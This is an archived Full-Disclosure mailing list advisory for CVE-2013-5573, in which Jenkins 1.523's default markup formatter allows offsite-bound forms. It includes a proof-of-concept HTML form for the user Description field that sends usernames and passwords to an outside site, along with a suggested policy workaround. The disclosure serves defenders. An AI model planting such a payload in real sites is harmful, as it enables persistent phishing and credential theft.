lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <52B09665.4070701@gmail.com>
Date: Tue, 17 Dec 2013 19:22:29 +0100
From: Christian Catalano <ch.catalano@...il.com>
To: moderators@...db.org, full-disclosure@...ts.grok.org.uk, 
 bugtraq@...urityfocus.com, vuln@...unia.com, submit@...sec.com, 
 submissions@...ketstormsecurity.com, submit@...7day.com, 
 vuldb@...urityfocus.com, submit@...ecurity.com
Subject: [CVE-2013-5573] Jenkins v1.523 Default markup
 formatter permits offsite-bound forms

###################################################

01. ###  Advisory Information ###

Title: Default markup formatter permits offsite-bound forms
Date published : 2013-12-16
Date of last update: 2013-12-16
Vendors contacted : Jenkins CI v 1.523
Discovered by: Christian Catalano
Severity: Low


02. ###  Vulnerability Information ###

CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s : Jenkins CI v 1.523
Class : HTML Injection


03. ### Introduction ###

Jenkins CI is an extendable open source continuous integration server 
http://jenkins-ci.org.


04. ### Vulnerability Description ###

The default installation and configuration of Jenkins CI is prone to a 
security vulnerability. The Jenkins CI default markup formatter permits 
offsite-bound forms. This vulnerability could be exploited by a remote 
attacker (a malicious user) to inject malicious persistent HTML script 
code (application side).


05. ### Technical Description / Proof of Concept Code ###

The vulnerability is located in the 'Descriotion' input field of the 
User Configuration  function:

https://localhost:9444/jenkins/user/attacker/configure

To reproduce the vulnerability,  the attacker (a malicious user) can add 
the malicious HTML script code:

<form method="POST" action="http://www.mocksite.org/login/login.php.">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>

in the 'Descriotion' input field and click on save button.
The code execution happens when the victim (an unaware user) view the 
'People List'

https://localhost:9444/jenkins/asynchPeople/

and click on attacker user id.


06. ### Business Impact ###

Exploitation of the persistent web vulnerability requires a low 
privilege web application user account.
Successful exploitation of the vulnerability results in persistent 
phishing and persistent external redirects.


07. ### Systems Affected ###


This vulnerability was tested against:
Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.


08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this 
vulnerability. It is possible to temporarily mitigate the flaw by 
implementing the following workaround:
'MyspacePolicy' permits
tag("form", "action", ONSITE_OR_OFFSITE_URL,
             "method");

Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or 
perhaps <form> could be banned entirely.


09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com


10.  ### Vulnerability History ###

August   21th, 2013: Vulnerability identification
August    4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor Solution
December 16th, 2013: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with 
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of 
this information.

###################################################

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ